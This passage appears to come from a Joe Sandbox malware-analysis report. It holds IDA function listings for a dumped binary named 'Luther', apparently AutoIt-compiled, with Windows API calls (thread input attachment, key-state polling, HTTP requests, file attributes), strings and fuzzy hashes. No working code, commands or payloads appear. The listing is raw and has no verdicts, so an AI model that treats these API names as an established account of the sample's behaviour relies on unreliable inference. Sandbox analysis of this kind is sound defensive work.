                                                                                                          • API String ID: 161812096-3044882817
                                                                                                          • Opcode ID: ad4cad153b0b8c0074cc544fbfdb4f4ffaf8ae660a9fa597f57b8f8a8d72b732
                                                                                                          • Instruction ID: e8e5ef720226596eba91602958143f1d493522b9b15e4a9434f150230cc3f858
                                                                                                          • Opcode Fuzzy Hash: ad4cad153b0b8c0074cc544fbfdb4f4ffaf8ae660a9fa597f57b8f8a8d72b732
                                                                                                          • Instruction Fuzzy Hash: 534188B6A01209EFDB14CF65DA58FAA7BB5FF09314F14402DFA05A7390C772A916CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E928B1
                                                                                                          • GetDlgCtrlID.USER32 ref: 00E928BC
                                                                                                          • GetParent.USER32 ref: 00E928D8
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E928DB
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00E928E4
                                                                                                          • GetParent.USER32(?), ref: 00E928F8
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E928FB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 711023334-1403004172
                                                                                                          • Opcode ID: 0fa00709a38b96967e7f8656d8ec2081484274d730eaf6fdcbc8c179bad729a3
                                                                                                          • Instruction ID: eedcc382de3c67d5f9267740d21d101694e985fedc9c1cfffc74a1051a2db17c
                                                                                                          • Opcode Fuzzy Hash: 0fa00709a38b96967e7f8656d8ec2081484274d730eaf6fdcbc8c179bad729a3
                                                                                                          • Instruction Fuzzy Hash: 6421D7B5900218BFCF15AFA0CC85DEEBBB4EF05310F00116ABA51B7291DB764819DB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E92990
                                                                                                          • GetDlgCtrlID.USER32 ref: 00E9299B
                                                                                                          • GetParent.USER32 ref: 00E929B7
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E929BA
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00E929C3
                                                                                                          • GetParent.USER32(?), ref: 00E929D7
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E929DA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 711023334-1403004172
                                                                                                          • Opcode ID: 01b45d5fff74f690827e20c0cf9ad0b2734aa3704c271bcd636a78ffcb979a82
                                                                                                          • Instruction ID: 5034e0e75d6693302cff9717edb332071e58b0517529d50259e2dd74cfe951da
                                                                                                          • Opcode Fuzzy Hash: 01b45d5fff74f690827e20c0cf9ad0b2734aa3704c271bcd636a78ffcb979a82
                                                                                                          • Instruction Fuzzy Hash: 1021A175D00218BFCF11ABA0CC85EFEBBB8EF05304F005066BA51B7291CB764859DB60
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EC4539
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EC453C
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC4563
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC4586
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EC45FE
                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EC4648
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EC4663
                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EC467E
                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EC4692
                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EC46AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 312131281-0
                                                                                                          • Opcode ID: ff0c1c2b9fe281c56a2e94740584e2e13d2d60ede810cdf5e1e15e0df051ac80
                                                                                                          • Instruction ID: cfde9542e30238eb35b5fa7669d205899adf78668c20be8cadb3ebde1099ca2a
                                                                                                          • Opcode Fuzzy Hash: ff0c1c2b9fe281c56a2e94740584e2e13d2d60ede810cdf5e1e15e0df051ac80
                                                                                                          • Instruction Fuzzy Hash: 20618BB5A00208AFDB10DFA4CD81FEE77F8EB09304F10415AFA04A72E1C775AA46EB50
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00E9BB18
                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB2C
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00E9BB33
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB42
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9BB54
                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB6D
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BB7F
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BBC4
                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BBD9
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E9ABA8,?,00000001), ref: 00E9BBE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: df322606b6a96bee6a8efdcc174b732b8774f1bb513f3db14f53b8ae2030552f
                                                                                                          • Instruction ID: c046aa8939fff965ad053db00dc9d3747b8e30831c5546dc13c8725306b4853a
                                                                                                          • Opcode Fuzzy Hash: df322606b6a96bee6a8efdcc174b732b8774f1bb513f3db14f53b8ae2030552f
                                                                                                          • Instruction Fuzzy Hash: AA3193B2904308AFDF109B15EE84FA97BA9FB4431AF104025FB05F71E4E775A845CB60
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E32AF9
                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00E32B98
                                                                                                          • UnregisterHotKey.USER32(?), ref: 00E32D7D
                                                                                                          • DestroyWindow.USER32(?), ref: 00E73A1B
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00E73A80
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E73AAD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                          • String ID: close all
                                                                                                          • API String ID: 469580280-3243417748
                                                                                                          • Opcode ID: b6cd17e8dd9f0cac26514d58483fb6c9de64d27be02ffd1f4c2f79da13df5f4c
                                                                                                          • Instruction ID: c3909281a4766bdc8a314ad5cec2394ab05748afc385a9c4b9ee911d9b7dcfd6
                                                                                                          • Opcode Fuzzy Hash: b6cd17e8dd9f0cac26514d58483fb6c9de64d27be02ffd1f4c2f79da13df5f4c
                                                                                                          • Instruction Fuzzy Hash: 69D14C31705212DFCB69EF24C94AA69FBA0BF44714F1162ADE98A7B251CB31AD12DF40
                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA89F2
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8A06
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00EA8A30
                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EA8A4A
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8A5C
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8AA5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA8AF5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 769691225-438819550
                                                                                                          • Opcode ID: e0a0a32378d1d8eda701be1530e9a1c620fe4c96ea32300792ea3ade456f97fe
                                                                                                          • Instruction ID: 49bcd70a34af6bc4f5a53bb9eb4644eb3d4e5ba5786e16780ec2c2b45c734bbd
                                                                                                          • Opcode Fuzzy Hash: e0a0a32378d1d8eda701be1530e9a1c620fe4c96ea32300792ea3ade456f97fe
                                                                                                          • Instruction Fuzzy Hash: A981A2719043409BCB24EE14C544ABBB7E8BF9A314F54682EF889FB250EF35E945CB52
                                                                                                          APIs
                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00E374D7
                                                                                                            • Part of subcall function 00E37567: GetClientRect.USER32(?,?), ref: 00E3758D
                                                                                                            • Part of subcall function 00E37567: GetWindowRect.USER32(?,?), ref: 00E375CE
                                                                                                            • Part of subcall function 00E37567: ScreenToClient.USER32(?,?), ref: 00E375F6
                                                                                                          • GetDC.USER32 ref: 00E76083
                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E76096
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00E760A4
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00E760B9
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E760C1
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E76152
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                          • String ID: U
                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                          • Opcode ID: 2f3ae225c6672dfe576f9d6bfa7c7dbdf32d4dbaed690a99883db81fd42fc6e7
                                                                                                          • Instruction ID: 2136f3cd2092e86173d47e34fc63ad8717726f75dd54afb1181a898539f4019d
                                                                                                          • Opcode Fuzzy Hash: 2f3ae225c6672dfe576f9d6bfa7c7dbdf32d4dbaed690a99883db81fd42fc6e7
                                                                                                          • Instruction Fuzzy Hash: 0E71CF71504605EFCF358F64CC88AEA3FB1FF49318F14A26AE9997A1A6C7319C41DB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                            • Part of subcall function 00E319CD: GetCursorPos.USER32(?), ref: 00E319E1
                                                                                                            • Part of subcall function 00E319CD: ScreenToClient.USER32(00000000,?), ref: 00E319FE
                                                                                                            • Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000001), ref: 00E31A23
                                                                                                            • Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000002), ref: 00E31A3D
                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00EC95C7
                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00EC95CD
                                                                                                          • ReleaseCapture.USER32 ref: 00EC95D3
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00EC966E
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EC9681
                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00EC975B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                          • Opcode ID: 588e138fafcec6e043524a533612f81da3fa84917eb0eed897315f3de88dea90
                                                                                                          • Instruction ID: adf3829f3b6c5c4b4f24b8a6b0aba6828cbd070af5f04d25b9cdfc5578cb8874
                                                                                                          • Opcode Fuzzy Hash: 588e138fafcec6e043524a533612f81da3fa84917eb0eed897315f3de88dea90
                                                                                                          • Instruction Fuzzy Hash: CE51B271204304AFD704EF24CD5AFAA7BE4FB84714F40152DF996A72E2CB729909DB52
                                                                                                          APIs
                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EACCB7
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EACCDF
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EACD0F
                                                                                                          • GetLastError.KERNEL32 ref: 00EACD67
                                                                                                          • SetEvent.KERNEL32(?), ref: 00EACD7B
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00EACD86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                          • Opcode ID: f7a4c5e72a6f32bf4bc95ac666acd150a52996795fbcf66155ab7959230e3296
                                                                                                          • Instruction ID: dc29cd222f89aa1d58c0125c3dbaccead32850a134d7c5f8c02768ffbf01f4b4
                                                                                                          • Opcode Fuzzy Hash: f7a4c5e72a6f32bf4bc95ac666acd150a52996795fbcf66155ab7959230e3296
                                                                                                          • Instruction Fuzzy Hash: 313191B1504604AFD7219F658C88EAB7FFCEB4A744B20553EF446BB200DB35ED099B61
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E755AE,?,?,Bad directive syntax error,00ECDCD0,00000000,00000010,?,?), ref: 00E9A236
                                                                                                          • LoadStringW.USER32(00000000,?,00E755AE,?), ref: 00E9A23D
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E9A301
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 858772685-4153970271
                                                                                                          • Opcode ID: f1521f9037749178234740a2a723a7677b6292447755d4cdced9ecc256ac0b2f
                                                                                                          • Instruction ID: 1d55503290d97439302cf64f0ca63c8d657ef232af3d9bf8d77c4525d02982a7
                                                                                                          • Opcode Fuzzy Hash: f1521f9037749178234740a2a723a7677b6292447755d4cdced9ecc256ac0b2f
                                                                                                          • Instruction Fuzzy Hash: F1214F3180431EEFCF11ABA0CC0AEEE7BB9BF18704F045469F615750A2EB729618DB51
                                                                                                          APIs
                                                                                                          • GetParent.USER32 ref: 00E929F8
                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00E92A0D
                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E92A9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                          • Opcode ID: bd90fbc359b5e48df99e9ff538c2bbaab0939d8b839296374bd393736a984908
                                                                                                          • Instruction ID: ab077bdc9f95e93a5fe59d8b189dc7fa7410567d710d8746c312976e39632f1a
                                                                                                          • Opcode Fuzzy Hash: bd90fbc359b5e48df99e9ff538c2bbaab0939d8b839296374bd393736a984908
                                                                                                          • Instruction Fuzzy Hash: F311297764830BBEFE246721DC07DA677EC8F14728B20202AFB04F40D1FBE268454614
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E3758D
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E375CE
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E375F6
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E3773A
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E3775B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1296646539-0
                                                                                                          • Opcode ID: 5bc1c7c83dfd0e9c16771ae82d6bd31c34886a196b3d7e498248bf3a9cd01fb8
                                                                                                          • Instruction ID: 2fc06874cb339f90c7c84723df49e45a5ad772cfc356a45c3b201917f4c8e4e4
                                                                                                          • Opcode Fuzzy Hash: 5bc1c7c83dfd0e9c16771ae82d6bd31c34886a196b3d7e498248bf3a9cd01fb8
                                                                                                          • Instruction Fuzzy Hash: 70C17E7590464AEFDB20CFA8C944BEDBBF1FF08318F14A41AE899B3250D734A951DB60
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1282221369-0
                                                                                                          • Opcode ID: 4e261bc3158297ca73ac43bca503f6ca783fef5125913d40ad75cbb8fd470171
                                                                                                          • Instruction ID: e452d5360a12341b84f640f1f41f6907d03c3721961f2cae5f620e11f81f9db3
                                                                                                          • Opcode Fuzzy Hash: 4e261bc3158297ca73ac43bca503f6ca783fef5125913d40ad75cbb8fd470171
                                                                                                          • Instruction Fuzzy Hash: 70614671F89305AFDB21AF75FC81AAD7BE4FF023A4B84256DE904F7291D63188008791
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EC5C24
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00EC5C65
                                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00EC5C6B
